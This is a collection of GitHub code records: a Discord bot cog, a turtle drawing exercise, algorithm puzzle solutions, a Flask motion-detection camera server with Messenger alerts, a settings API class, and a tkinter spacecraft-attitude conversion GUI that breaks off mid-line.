self.check_comics_and_post(\n comic_list,\n strip_details,\n comic_keys,\n called_channel=inter.channel,\n post_time=post_time,\n )\n else:\n await send_message(\n inter, \"No comics to send!\", next_send=NextSend.Followup\n )\n else:\n # Warns that no comic are available\n await send_message(inter, \"This server is not subscribed to any comic!\")\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @app_commands.checks.check(is_owner)\n async def update_database_clean(self, inter: discord.Interaction):\n \"\"\"Clean the database from servers that don't have any comics saved\n\n :param inter: The context of the where the command was called.\n \"\"\"\n nb_removed = clean_database(bot=self.bot, strict=True, logger_=logger)\n\n await send_message(\n inter, f\"Cleaned the database from {nb_removed} inactive server(s).\"\n )\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @commands.is_owner()\n async def restore_last_backup(self, inter: discord.Interaction):\n \"\"\"Restore a previous backup\n\n :param inter: The context of the where the command was called.\n \"\"\"\n # Stops the database cleaning and restore the last backup\n self.do_cleanup = False\n restore_backup()\n\n await send_message(\n inter,\n \"Last backup restored! Please reboot the bot to re-enable automatic cleanups!\",\n )\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @commands.is_owner()\n async def do_backup(self, inter: discord.Interaction):\n \"\"\"Force a backup\n\n :param inter: The context of the where the command was called.\n \"\"\"\n # Force a backup\n save_backup(load_json(DATABASE_FILE_PATH), logger)\n await send_message(inter, \"Backup done!\")\n\n\nasync def setup(bot: commands.Bot):\n \"\"\"Initialize the cog\n\n :param bot: The discord Bot\n \"\"\"\n await bot.add_cog(PosterHandler(bot))\n","repo_name":"BBArikL/BDBot","sub_path":"bdbot/cogs/AutomaticPoster.py","file_name":"AutomaticPoster.py","file_ext":"py","file_size_in_byte":19253,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17439927686","text":"#Aula 6 exercicio 6 apostila + funções extra!\n#Fazer 4 estrelas.\nimport turtle\njn=turtle.Screen()\njn.title(\"4 stars!!!\")\njn.bgcolor(\"MidnightBlue\")\n\nstar=turtle.Turtle()\nstar.color(\"white\")\nstar.shape(\"turtle\")\nstar.speed(0)\nstar.pensize(2)\nstar.hideturtle() #essa função faz a Turtle ficar \"invisivel\".\n\n#Podemos criar uma função para desenhar estrelas\n\ndef drawing_stars():\n star.pendown() #essa função coloca a caneta no papel\n star.begin_fill() #essa função pinta formas fechadas\n for n in range(5): \n star.left(144)\n star.forward(100)\n star.end_fill()\n star.penup() #Essa função levanta a caneta do papel. Assim podemos mudar a posição da tartaruga entre estrelas sem marcar com linhas o caminho.\n\n#Agora é só definir a posição das estrelas\n\nfor i in range(4):\n drawing_stars()\n star.left(90)\n star.forward(300)\n","repo_name":"jvictor42/PyUERJ-first-steps","sub_path":"Exercicios apostila e exemplos/Aula6.6A.py","file_name":"Aula6.6A.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74150564649","text":"import sys\r\nread = sys.stdin.readline\r\n\r\nn = int(read().rstrip())\r\n\r\ndp=[0]*1010\r\n\r\ndp[1]=1\r\ndp[2]=3\r\ndp[3]=5\r\ncount = 1\r\nif(n>3):\r\n for i in range(4,n+1):\r\n dp[i] = dp[i-1] + 2*dp[i-2]\r\n\r\nprint(dp[n]%10007)","repo_name":"Dakota-Han/baekjoon","sub_path":"백준/Silver/11727. 2×n 타일링 2/2×n 타일링 2.py","file_name":"2×n 타일링 2.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16672901078","text":"# -*- coding: UTF-8 -*-\n\nfrom flask import Flask, render_template, Response\nimport cv2, time, pandas\nfrom time import sleep\nimport sys\nfrom fbchat import Client\nfrom fbchat.models import *\nimport fbchat\nimport re\nfrom getpass import getpass\n# importing datetime class from datetime library\nfrom datetime import datetime\n\napp = Flask(__name__)\n\ncamera = cv2.VideoCapture(0)\n\nfbchat._util.USER_AGENTS = [\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\"]\nfbchat._state.FB_DTSG_REGEX = re.compile(r'\"name\":\"fb_dtsg\",\"value\":\"(.*?)\"')\n\nclient = Client(\"hamdan.radaideh@hotmail.com\", getpass())\n\nfrom requests import get\n\ndef send_msg(msg, image):\n time=str(datetime.now())\n ip = get('https://api.ipify.org').text\n receivers_ids=['1435843372'] #, '100036488761702']\n for thread_id in receivers_ids:\n print('Send text', file=sys.stdout)\n client.send(\n Message(text=msg+\" \\nat : \"+time+\"\\nGo to http://\"+str(format(ip))+\"/ \\n for live feed !\"),\n thread_id=thread_id,\n thread_type=ThreadType.USER\n )\n\n\n\ndef gen_frames(): # generate frame by frame from camera\n # Assigning our static_back to None\n static_back = None\n\n # List when any moving object appear\n motion_list = [ None, None ]\n\n # Time of movement\n time = []\n\n # Initializing DataFrame, one column is start\n # time and other column is end time\n df = pandas.DataFrame(columns = [\"Start\", \"End\"])\n while True:\n sleep(0.1)\n # Capture frame-by-frame\n success, frame = camera.read() # read the camera frame\n if not success:\n break\n else:\n # Initializing motion = 0(no motion)\n motion = 0\n\n # Converting color image to gray_scale image\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Converting gray scale image to GaussianBlur\n # so that change can be find easily\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n # In first iteration we assign the value\n # of static_back to our first frame\n if static_back is None:\n static_back = gray\n continue\n\n # Difference between static background\n # and current frame(which is GaussianBlur)\n diff_frame = cv2.absdiff(static_back, gray)\n\n # If change in between static background and\n # current frame is greater than 30 it will show white color(255)\n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations = 2)\n\n # Finding contour of moving object\n cnts,_ = cv2.findContours(thresh_frame.copy(),\n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in cnts:\n if cv2.contourArea(contour) < 10000:\n continue\n motion = 1\n\n (x, y, w, h) = cv2.boundingRect(contour)\n # making green rectangle arround the moving object\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n # Appending status of motion\n motion_list.append(motion)\n\n motion_list = motion_list[-2:]\n\n ret, buffer = cv2.imencode('.jpg', frame)\n frame = buffer.tobytes()\n\n # Appending Start time of motion\n if motion_list[-1] == 1 and motion_list[-2] == 0:\n time.append(datetime.now())\n send_msg(\"Motion Detected\")\n print('Motion started', file=sys.stdout)\n\n # Appending End time of motion\n if motion_list[-1] == 0 and motion_list[-2] == 1:\n time.append(datetime.now())\n send_msg(\"Motion Finished\")\n print('Motion finished', file=sys.stdout)\n\n\n\n key = cv2.waitKey(1)\n # if q entered whole process will stop\n if key == ord('q'):\n # if something is movingthen it append the end time of movement\n if motion == 1:\n time.append(datetime.now())\n break\n\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n') # concat frame one by one and show result\n\n\n@app.route('/video_feed')\ndef video_feed():\n #Video streaming route. Put this in the src attribute of an img tag\n return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/')\ndef index():\n \"\"\"Video streaming home page.\"\"\"\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True,use_reloader=False,host=\"192.168.1.20\")\n","repo_name":"halradaideh/surveillance_camera","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44898207545","text":"import threading\n\n\n# ---------------------------------------------------\n\n# class for API\n\nclass SynvillaAPI:\n \n _instance = None\n _lock = threading.Lock()\n\n def __new__(cls):\n if cls._instance is None: \n with cls._lock:\n # Another thread could have created the instance\n # before we acquired the lock. So check that the\n # instance is still nonexistent.\n if not cls._instance:\n cls._instance = super().__new__(cls)\n return cls._instance\n \n\n \n def __init__(self): \n self.status = \"\"\n self.status2 = \"\"\n self.version = \"\"\n \n self.text = \"\" #text \n self.ntext = \"\" #nprompt\n self.mtext = \"\"\n self.nmtext = \"\"\n \n self.resetL = False # reset latents\n self.newImg = False # new init image\n self.newMask = False\n self.resetMask = False\n self.resetImg = False # reset init image\n\n s = 0.5\n self.beta = s\n self.guidance = 0 #newLR = None\n self.steps = 50\n self.newsteps = self.steps\n \n self.ctr = None # iteration number\n self.extranoise = 0\n self.change_i = None\n self.seed = 0 #newseed = 0\n self.seedlock = False\n\n self.blend = 0\n self.mline = \"\"\n self.nmline = \"\"\n self.inpaint = 0\n \n #simg = False\n \n self.gamma = 1\n self.contrast = 1\n self.newprompt = False\n\n self.maxnoise = 0.6\n self.total = 0\n self.bg_w = 1\n self.fg_w = 1\n \n self.h = 768\n self.w = 768\n self.schedlist = []\n self.modelist = []\n self.model = \"\"\n self.sched = \"\" \n \n self.wh_changed = False\n self.model_changed = False\n self.sched_changed = False\n \n def getDataObj(self): \n \n d = type('', (), {})()\n d.text = self.text\n d.ntext = self.ntext\n d.mtext = self.mtext\n d.nmtext = self.nmtext\n d.i = self.ctr\n d.n = self.total\n d.beta = self.beta\n d.steps = self.newsteps\n d.lr = self.guidance\n d.seed = self.seed\n #d.fg = self.fg_w\n d.bgw = self.bg_w\n d.fgw = self.fg_w\n d.blend = self.blend\n d.gamma = self.gamma\n d.noise = self.extranoise\n d.status = self.status\n d.status2 = self.status2\n d.version = self.version\n \n # todo, include these only when needed\n d.modellist = self.modellist\n d.schedlist = self.schedlist\n d.model = self.model\n d.sched = self.sched\n d.h = self.h\n d.w = self.w\n d.inpaint = self.inpaint\n d.contrast = self.contrast\n \n \n #print(\"getobj\", d.text)\n \n return d\n \n def setSettings(self, h, w, m, s):\n if (h != self.h) or (w != self.w):\n self.wh_changed = True\n self.h = h\n self.w = w\n \n if (m != self.model):\n self.model_changed = True\n self.model = m\n \n if (s != self.sched):\n self.sched_changed = True\n self.sched = s\n \n return \n \n\n def setLock(self, s):\n if int(s) == 0:\n self.seedlock = False\n else:\n self.seedlock = True\n return \n\n def setSeed(self, s):\n self.seed = int(s)\n return\n\n def setBlend(self, s):\n self.blend = int(s)\n print(\"blend set to \",s)\n return\n\n def setInpaint(self, s):\n self.inpaint = int(s)\n\n def setGamma(self, s):\n self.gamma = float(s)\n return\n\n def setContrast(self, s):\n self.contrast = float(s)\n return\n\n def resetLats(self):\n self.resetL = True\n print(\"set lats to be reseted\")\n return\n\n def setText(self, text, ntext, mtext, nmtext):\n print(\"new prompt:\", text, \"neg:\", ntext)\n print(\"new mask prompt:\", mtext, \"neg:\", nmtext)\n self.text = text\n self.ntext = ntext\n self.mtext = mtext\n self.nmtext = nmtext\n self.newprompt = True\n return \n\n def setBeta(self, val):\n print(\"new beta:\", val, \" s=\",self.beta)\n self.beta = float(val)\n return \n\n def setSteps(self, val):\n print(\"new steps:\", val)\n self.newsteps = int(val)\n return \n\n ''''' \n def setIter(val):\n print(\"jump to iter:\", val)\n self.change_i = int(val)\n return \n '''\n \n def setLR(self, val):\n print(\"new g:\", val)\n self.guidance = float(val)\n return \n \n def setNoise(self, val):\n print(\"extra noise:\", val)\n self.extranoise = float(val)\n return \n\n def setBgw(self, val):\n print(\"attenuate:\", val)\n self.bg_w = float(val)\n return \n\n def setFgw(self, val):\n print(\"fwg:\", val)\n self.fg_w = float(val)\n return \n \n \n def setImg(self):\n print(\"img received\")\n self.newImg = True\n return\n\n \n def setMask(self):\n print(\"mask received\")\n self.newMask = True\n return\n\n def clearMask(self):\n global resetMask\n print(\"setting mask to none\")\n self.resetMask = True\n return\n\n\n def getChanges(self):\n go = self.newprompt\n #self.newprompt = False \n return go, self.text, self.ntext, self.mtext, self.nmtext \n\n\n# ---------------------------------------------------------","repo_name":"htoyryla/synvilla","sub_path":"synvilla_api.py","file_name":"synvilla_api.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13852799186","text":"from numba import jit\nfrom fractions import gcd\n\n@jit\ndef solve(n):\n N = 5 * (10 ** 6)\n mu = [0] * N\n mu[1] = 1\n for d in range(1, N):\n for i in range(d + d, N, d):\n mu[i] -= mu[d]\n coprimes = [0] * N\n for d in range(1, N):\n for i in range(d, N, d):\n coprimes[i] += mu[d] * (i // d)\n\n result = 2\n d = 3\n while coprimes[d] * d // 2 <= n:\n result += coprimes[d]\n n -= d * coprimes[d] // 2\n d += 1\n result1 = result + (n // d) * 2\n x = d // 2\n while gcd(x, d) != 1:\n x -= 1\n result2 = result + 1 + (n - d + x) // d * 2\n return max(result1, result2)\n\nprint(solve(1))\nprint(solve(3))\nprint(solve(9))\nprint(solve(11))\nprint(solve(100))\nprint(solve(50000))\nprint(solve(10 ** 18))\n","repo_name":"ftiasch/acm-icpc","sub_path":"project-euler/p604.py","file_name":"p604.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"28525186295","text":"import json\nimport sys\nimport random\nimport ast\n\nin_file = sys.argv[1]\nout_file = in_file.replace(\".json\", \".utt.json\")\nwith open(sys.argv[1], 'r') as in_data, open(out_file, 'w') as out_data:\n for line in in_data:\n try:\n data = json.loads(line)\n except:\n continue\n utterance = data[\"body\"].strip()\n if len(utterance.split()) < 2:\n continue\n label = random.choice([\"yes\", \"no\"])\n try:\n json_obj = json.dumps({\"utterance\": utterance, \"label\": label})\n except:\n continue\n out_data.write(json_obj + \"\\n\")","repo_name":"amazon-science/label-aware-pretrain","sub_path":"data/reddit/make_json.py","file_name":"make_json.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"25278480142","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 13:08:54 2018\n\n@author: aarvai\n\"\"\"\n\nimport numpy as np\nfrom tkinter import Tk\nfrom tkinter import Entry, DoubleVar, END, N, E, S, W\nfrom tkinter import ttk\n\n# Select tkinter style\n# s = ttk.Style()\n# print(\"Tkinter theme options are:\")\n# print(s.theme_names())\n# print(\"Current Tkinter theme:\")\n# print(s.theme_use())\n# s.theme_use('clam')\n\n\nclass AcsGui:\n\n enter_value: Entry\n\n def __init__(self, master):\n\n global ephSunPosX, ephSunPosY, ephSunPosZ\n global ephJwstPosX, ephJwstPosY, ephJwstPosZ\n global ephSunVecX, ephSunVecY, ephSunVecZ\n global ephSunVecNormX, ephSunVecNormY, ephSunVecNormZ\n\n global att1RA, att1Dec, att1PA\n global att1Quat1, att1Quat2, att1Quat3, att1Quat4\n global att1SunRoll, att1SunPitch, att1SunYaw\n\n global att2RA, att2Dec, att2PA\n global att2Quat1, att2Quat2, att2Quat3, att2Quat4\n global att2SunRoll, att2SunPitch, att2SunYaw\n\n global slewMom, slewDur, slewAngRoll, slewAngPitch, slewAngYaw\n\n global vectorsEciX, vectorsEciY, vectorsEciZ\n global vectorsJ1, vectorsJ2, vectorsJ3\n\n # Ephemeris Variables\n ephSunPosX = DoubleVar()\n ephSunPosY = DoubleVar()\n ephSunPosZ = DoubleVar()\n ephJwstPosX = DoubleVar()\n ephJwstPosY = DoubleVar()\n ephJwstPosZ = DoubleVar()\n ephSunVecX = DoubleVar()\n ephSunVecY = DoubleVar()\n ephSunVecZ = DoubleVar()\n ephSunVecNormX = DoubleVar()\n ephSunVecNormY = DoubleVar()\n ephSunVecNormZ = DoubleVar()\n\n # Attitude 1 Variables\n att1RA = DoubleVar()\n att1Dec = DoubleVar()\n att1PA = DoubleVar()\n att1Quat1 = DoubleVar()\n att1Quat2 = DoubleVar()\n att1Quat3 = DoubleVar()\n att1Quat4 = DoubleVar()\n att1SunRoll = DoubleVar()\n att1SunPitch = DoubleVar()\n att1SunYaw = DoubleVar()\n\n # Attitude 2 Variables\n att2RA = DoubleVar()\n att2Dec = DoubleVar()\n att2PA = DoubleVar()\n att2Quat1 = DoubleVar()\n att2Quat2 = DoubleVar()\n att2Quat3 = DoubleVar()\n att2Quat4 = DoubleVar()\n att2SunRoll = DoubleVar()\n att2SunPitch = DoubleVar()\n att2SunYaw = DoubleVar()\n\n # Slew Variables\n slewMom = DoubleVar()\n slewDur = DoubleVar()\n slewAngRoll = DoubleVar()\n slewAngPitch = DoubleVar()\n slewAngYaw = DoubleVar()\n\n # Vectors Variables\n vectorsEciX = DoubleVar()\n vectorsEciY = DoubleVar()\n vectorsEciZ = DoubleVar()\n vectorsJ1 = DoubleVar()\n vectorsJ2 = DoubleVar()\n vectorsJ3 = DoubleVar()\n\n # print(\"Tkinter theme options are:\")\n # print(ttk.Style().theme_names())\n # print(\"Current Tkinter theme:\")\n # print(ttk.Style().theme_use())\n # ttk.Style().theme_use('vista')\n print(ttk.Style().lookup(\"TButton\", \"font\"))\n\n #ttk.Style().configure(\"TLabel\", padding=10)\n #ttk.Style().configure(\"TEntry\", padding=10)\n #print(ttk.Style().element_options('TButton'))\n\n # Title\n self.title = ttk.Label(text=\"ACS Conversion Tool\")\n self.title.grid(row=0, column=0, columnspan=10)\n\n # Define top-level frames\n self.ephFrame = ttk.Frame(master, relief='ridge')\n self.ephFrame.grid(row=1, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.att1Frame = ttk.Frame(master, relief='ridge')\n self.att1Frame.grid(row=2, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.att2Frame = ttk.Frame(master, relief='ridge')\n self.att2Frame.grid(row=3, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.slewFrame = ttk.Frame(master, relief='ridge')\n self.slewFrame.grid(row=4, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.vectorsFrame = ttk.Frame(master, relief='ridge')\n self.vectorsFrame.grid(row=5, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n # Ephemeris Section---------------------------------------------------------------------------------------------\n\n # Ephemeris Top Level Layout---------------------------------------\n\n # Ephemeris Title\n self.ephemLabel = ttk.Label(self.ephFrame, text=\"Ephemeris\")\n self.ephemLabel.grid(row=0, column=0, columnspan=6, pady=2)\n\n # Ephemeris Position Frame\n self.ephPosFrame = ttk.Frame(self.ephFrame, relief='groove')\n self.ephPosFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.ephFrame.columnconfigure(0, weight=4)\n\n # Button to Convert Positions to Sun Vector\n self.ephPosToVecButton = ttk.Button(self.ephFrame, text=\"▶\", width=2, command=self.ephPosToVec)\n self.ephPosToVecButton.grid(row=1, column=1)\n self.ephFrame.columnconfigure(1, weight=1)\n\n # Ephemeris Sun Vector Frame\n self.ephSunVecFrame = ttk.Frame(self.ephFrame,relief='groove')\n self.ephSunVecFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.ephFrame.columnconfigure(2, weight=2)\n\n # Convert sun vector to normalized sun vector\n self.ephVecToNormVecButton = ttk.Button(self.ephFrame, text=\"▶\", width=2, command=self.ephVecToNormVec)\n self.ephVecToNormVecButton.grid(row=1, column=3)\n self.ephFrame.columnconfigure(3, weight=1)\n\n # Ephemeris Sun Vector Frame\n self.ephSunVecNormFrame = ttk.Frame(self.ephFrame,relief='groove')\n self.ephSunVecNormFrame.grid(row=1, column=4, ipady=2)\n self.ephFrame.columnconfigure(4, weight=3)\n\n # Clear ephem\n self.ephClearButton = ttk.Button(self.ephFrame, text=\"Clear\", width=5, command=self.ephClear)\n self.ephClearButton.grid(row=1, column=5, padx=10)\n self.ephFrame.columnconfigure(0, weight=4)\n\n # Ephemeris Position Frame - Details ------------------------------\n\n self.ephPosLabel = ttk.Label(self.ephPosFrame, text=\"Positions (ECI, km)\")\n self.ephPosLabel.grid(row=0, column=0, columnspan=3, pady=2)\n\n self.ephPosXLabel = ttk.Label(self.ephPosFrame, text=\"x\")\n self.ephPosXLabel.grid(row=2, column=0, padx=5)\n\n self.ephPosYLabel = ttk.Label(self.ephPosFrame, text=\"y\")\n self.ephPosYLabel.grid(row=3, column=0, padx=5)\n\n self.ephPosZLabel = ttk.Label(self.ephPosFrame, text=\"z\")\n self.ephPosZLabel.grid(row=4, column=0, padx=5)\n\n self.ephSunLabel = ttk.Label(self.ephPosFrame, text=\"Sun\")\n self.ephSunLabel.grid(row=1, column=1)\n\n self.ephSunPosXEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephSunPosX)\n self.ephSunPosXEntry.grid(row=2, column=1)\n self.ephSunPosXEntry.focus_set()\n\n self.ephSunPosYEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephSunPosY)\n self.ephSunPosYEntry.grid(row=3, column=1)\n\n self.ephSunPosZEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephSunPosZ)\n self.ephSunPosZEntry.grid(row=4, column=1)\n\n self.ephJwstLabel = ttk.Label(self.ephPosFrame, text=\"JWST\")\n self.ephJwstLabel.grid(row=1, column=2)\n\n self.ephJwstPosXEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephJwstPosX)\n self.ephJwstPosXEntry.grid(row=2, column=2)\n\n self.ephJwstPosYEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephJwstPosY)\n self.ephJwstPosYEntry.grid(row=3, column=2)\n\n self.ephJwstPosZEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephJwstPosZ)\n self.ephJwstPosZEntry.grid(row=4, column=2)\n\n # Ephemeris Sun Vector Frame - Details-----------------------------\n self.ephSunVecLabel = ttk.Label(self.ephSunVecFrame, text=\"Sun Vector\")\n self.ephSunVecLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.ephSunVecUnitLabel = ttk.Label(self.ephSunVecFrame, text=\"(ECI, km)\")\n self.ephSunVecUnitLabel.grid(row=1, column=0, columnspan=2)\n\n self.ephSunVecXLabel = ttk.Label(self.ephSunVecFrame, text=\"x\")\n self.ephSunVecXLabel.grid(row=2, column=0, padx=5)\n\n self.ephSunVecYLabel = ttk.Label(self.ephSunVecFrame, text=\"y\")\n self.ephSunVecYLabel.grid(row=3, column=0, padx=5)\n\n self.ephSunVecZLabel = ttk.Label(self.ephSunVecFrame, text=\"z\")\n self.ephSunVecZLabel.grid(row=4, column=0, padx=5)\n\n self.ephSunVecXEntry = ttk.Entry(self.ephSunVecFrame, width=10, textvariable=ephSunVecX)\n self.ephSunVecXEntry.grid(row=2, column=1)\n\n self.ephSunVecYEntry = ttk.Entry(self.ephSunVecFrame, width=10, textvariable=ephSunVecY)\n self.ephSunVecYEntry.grid(row=3, column=1)\n\n self.ephSunVecZEntry = ttk.Entry(self.ephSunVecFrame, width=10, textvariable=ephSunVecZ)\n self.ephSunVecZEntry.grid(row=4, column=1)\n\n # Ephemeris Normalized Sun Vector Frame - Details------------------\n\n self.ephSunVecNormLabel = ttk.Label(self.ephSunVecNormFrame, text=\"Sun Vector Normalized\")\n self.ephSunVecNormLabel.grid(row=0, column=0, columnspan=2, padx=5, pady=2)\n\n self.ephSunVecNormUnitLabel = ttk.Label(self.ephSunVecNormFrame, text=\"(ECI, unitless)\")\n self.ephSunVecNormUnitLabel.grid(row=1, column=0, columnspan=2)\n\n self.ephSunVecNormXLabel = ttk.Label(self.ephSunVecNormFrame, text=\"x\")\n self.ephSunVecNormXLabel.grid(row=2, column=0)\n\n self.ephSunVecNormYLabel = ttk.Label(self.ephSunVecNormFrame, text=\"y\")\n self.ephSunVecNormYLabel.grid(row=3, column=0)\n\n self.ephSunVecNormZLabel = ttk.Label(self.ephSunVecNormFrame, text=\"z\")\n self.ephSunVecNormZLabel.grid(row=4, column=0)\n\n self.ephSunVecNormXEntry = ttk.Entry(self.ephSunVecNormFrame, width=10, textvariable=ephSunVecNormX)\n self.ephSunVecNormXEntry.grid(row=2, column=1)\n\n self.ephSunVecNormYEntry = ttk.Entry(self.ephSunVecNormFrame, width=10, textvariable=ephSunVecNormY)\n self.ephSunVecNormYEntry.grid(row=3, column=1)\n\n self.ephSunVecNormZEntry = ttk.Entry(self.ephSunVecNormFrame, width=10, textvariable=ephSunVecNormZ)\n self.ephSunVecNormZEntry.grid(row=4, column=1)\n\n # Attitude 1 Section--------------------------------------------------------------------------------------------\n\n # Attitude 1 Top Level Layout--------------------------------------\n\n # Attitude 1 Title\n self.att1Label = ttk.Label(self.att1Frame, text=\"Attitude 1\")\n self.att1Label.grid(row=0, column=0, columnspan=6, padx=0, pady=2)\n\n # Attitude 1 Celestial Frame\n self.att1CelestFrame = ttk.Frame(self.att1Frame, relief='groove')\n self.att1CelestFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.att1Frame.columnconfigure(0, weight=4)\n\n # Attitude 1 Button 1 Frame\n self.att1But1Frame = ttk.Frame(self.att1Frame)\n self.att1But1Frame.grid(row=1, column=1, ipady=2)\n self.att1Frame.columnconfigure(1, weight=1)\n\n # Attitude 1 Quaternion Frame\n self.att1QuatFrame = ttk.Frame(self.att1Frame, relief='groove')\n self.att1QuatFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.att1Frame.columnconfigure(2, weight=4)\n\n # Attitude 1 Button 2 Frame\n self.att1But2Frame = ttk.Frame(self.att1Frame)\n self.att1But2Frame.grid(row=1, column=3, ipady=2)\n self.att1Frame.columnconfigure(3, weight=1)\n\n # Attitude 1 Celestial Frame\n self.att1SunAngFrame = ttk.Frame(self.att1Frame, relief='groove')\n self.att1SunAngFrame.grid(row=1, column=4, ipadx=10, ipady=2)\n self.att1Frame.columnconfigure(4, weight=2)\n\n # Clear att1\n self.att1ClearButton = ttk.Button(self.att1Frame, text=\"Clear\", width=5, command=self.att1Clear)\n self.att1ClearButton.grid(row=1, column=5, padx=10)\n self.att1Frame.columnconfigure(5, weight=4)\n\n # Attitude 1 Celestial Frame - Details----------------------------\n\n self.att1CelestLabel = ttk.Label(self.att1CelestFrame, text=\"Celestial\")\n self.att1CelestLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att1RALabel = ttk.Label(self.att1CelestFrame, text=\"RA\")\n self.att1RALabel.grid(row=1, column=0, padx=5)\n\n self.att1DecLabel = ttk.Label(self.att1CelestFrame, text=\"Dec\")\n self.att1DecLabel.grid(row=2, column=0, padx=5)\n\n self.att1PALabel = ttk.Label(self.att1CelestFrame, text=\"PA\")\n self.att1PALabel.grid(row=3, column=0, padx=5)\n\n self.att1RAEntry = ttk.Entry(self.att1CelestFrame, width=10, textvariable=att1RA)\n self.att1RAEntry.grid(row=1, column=1)\n\n self.att1DecEntry = ttk.Entry(self.att1CelestFrame, width=10, textvariable=att1Dec)\n self.att1DecEntry.grid(row=2, column=1)\n\n self.att1PAEntry = ttk.Entry(self.att1CelestFrame, width=10, textvariable=att1PA)\n self.att1PAEntry.grid(row=3, column=1)\n\n # Attitude 1 Button 1 Frame - Details-----------------------------\n\n # Button to Convert Celestial to Quaternion\n self.att1CelestToQuatButton = ttk.Button(self.att1But1Frame, text=\"▶\", width=2, command=self.att1CelestToQuat)\n self.att1CelestToQuatButton.grid(row=1, column=1)\n\n # Button to Convert Quaternion to Celestial\n self.att1QuatToCelestButton = ttk.Button(self.att1But1Frame, text=\"◀\", width=2, command=self.att1QuatToCelest)\n self.att1QuatToCelestButton.grid(row=2, column=1)\n\n # Attitude 1 Quaternion Frame - Details----------------------------\n\n self.att1QuatLabel = ttk.Label(self.att1QuatFrame, text=\"Quaternion\")\n self.att1QuatLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att1Quat1Label = ttk.Label(self.att1QuatFrame, text=\"q1\")\n self.att1Quat1Label.grid(row=1, column=0, padx=5)\n\n self.att1Quat2Label = ttk.Label(self.att1QuatFrame, text=\"q2\")\n self.att1Quat2Label.grid(row=2, column=0, padx=5)\n\n self.att1Quat3Label = ttk.Label(self.att1QuatFrame, text=\"q3\")\n self.att1Quat3Label.grid(row=3, column=0, padx=5)\n\n self.att1Quat4Label = ttk.Label(self.att1QuatFrame, text=\"q4\")\n self.att1Quat4Label.grid(row=4, column=0, padx=5)\n\n self.att1Quat1Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat1)\n self.att1Quat1Entry.grid(row=1, column=1)\n\n self.att1Quat2Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat2)\n self.att1Quat2Entry.grid(row=2, column=1)\n\n self.att1Quat3Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat3)\n self.att1Quat3Entry.grid(row=3, column=1)\n\n self.att1Quat4Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat4)\n self.att1Quat4Entry.grid(row=4, column=1)\n\n # Attitude 1 Button 2 Frame - Details-----------------------------\n\n # Button to Convert Quaternion to Sun Angles\n self.att1CelestToSunAngBut = ttk.Button(self.att1But2Frame, text=\"▶\", width=2, command=self.att1QuatToSunAng)\n self.att1CelestToSunAngBut.grid(row=1, column=1)\n\n # Button to Convert Sun Angles to Quaternion\n self.att1CelestToSunAngBut = ttk.Button(self.att1But2Frame, text=\"◀\", width=2, command=self.att1SunAngToQuat)\n self.att1CelestToSunAngBut.grid(row=2, column=1)\n\n # Attitude 1 Sun Angles Frame - Details---------------------------\n\n self.att1SunAngLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Angles\")\n self.att1SunAngLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att1SunRollLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Roll\")\n 